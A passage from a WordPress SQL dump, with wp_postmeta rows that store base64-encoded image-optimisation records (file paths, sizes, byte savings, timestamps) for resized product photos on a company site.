1nbGFzcy1tZXRhbC1jbGVhbmVyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMDgsInRpbWUiOjE0ODM1NzE4NzYsImlkIjoxMzk3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjYwLXBsYXN0aWMtZ2xhc3MtbWV0YWwtY2xlYW5lci0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI2MC1wbGFzdGljLWdsYXNzLW1ldGFsLWNsZWFuZXItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNjAtcGxhc3RpYy1nbGFzcy1tZXRhbC1jbGVhbmVyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxODc5LCJpZCI6MTM5N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI2MC1wbGFzdGljLWdsYXNzLW1ldGFsLWNsZWFuZXItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNjAtcGxhc3RpYy1nbGFzcy1tZXRhbC1jbGVhbmVyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjYwLXBsYXN0aWMtZ2xhc3MtbWV0YWwtY2xlYW5lci0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTg4MSwiaWQiOjEzOTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNjAtcGxhc3RpYy1nbGFzcy1tZXRhbC1jbGVhbmVyLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjYwLXBsYXN0aWMtZ2xhc3MtbWV0YWwtY2xlYW5lci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI2MC1wbGFzdGljLWdsYXNzLW1ldGFsLWNsZWFuZXItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE4ODQsImlkIjoxMzk3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29551, 1396, 'wpfc_optimisation_reduction', '2014613'); 
INSERT INTO `wp_postmeta` VALUES (29552, 1396, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4uanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4uanBnIiwicmVkdWN0aW9uIjoyMDE0MDU0LCJ0aW1lIjoxNDgzNTcxODk2LCJpZCI6IjEzOTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTg5OCwiaWQiOjEzOTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTAxLCJpZCI6MTM5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5MDQsImlkIjoxMzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTA4LCJpZCI6MTM5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5MTAsImlkIjoxMzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTkxMywiaWQiOjEzOTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTE1LCJpZCI6MTM5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5MTgsImlkIjoxMzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMjgsInRpbWUiOjE0ODM1NzE5MjEsImlkIjoxMzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxNzQsInRpbWUiOjE0ODM1NzE5MjMsImlkIjoxMzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNDYsInRpbWUiOjE0ODM1NzE5MjYsImlkIjoxMzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTI5LCJpZCI6MTM5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTkzMSwiaWQiOjEzOTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNTUtc3VyZmFjZS1wcmVwLWNsZWFuLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjU1LXN1cmZhY2UtcHJlcC1jbGVhbi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI1NS1zdXJmYWNlLXByZXAtY2xlYW4tNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5MzQsImlkIjoxMzk2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29553, 1395, 'wpfc_optimisation_reduction', '2168491'); 
INSERT INTO `wp_postmeta` VALUES (29554, 1395, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUuanBnIiwicmVkdWN0aW9uIjoyMTY4MTE1LCJ0aW1lIjoxNDgzNTcxOTQ1LCJpZCI6IjEzOTUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTk0OCwiaWQiOjEzOTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTUxLCJpZCI6MTM5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5NTQsImlkIjoxMzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTU3LCJpZCI6MTM5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5NjAsImlkIjoxMzk1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTk2MiwiaWQiOjEzOTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cG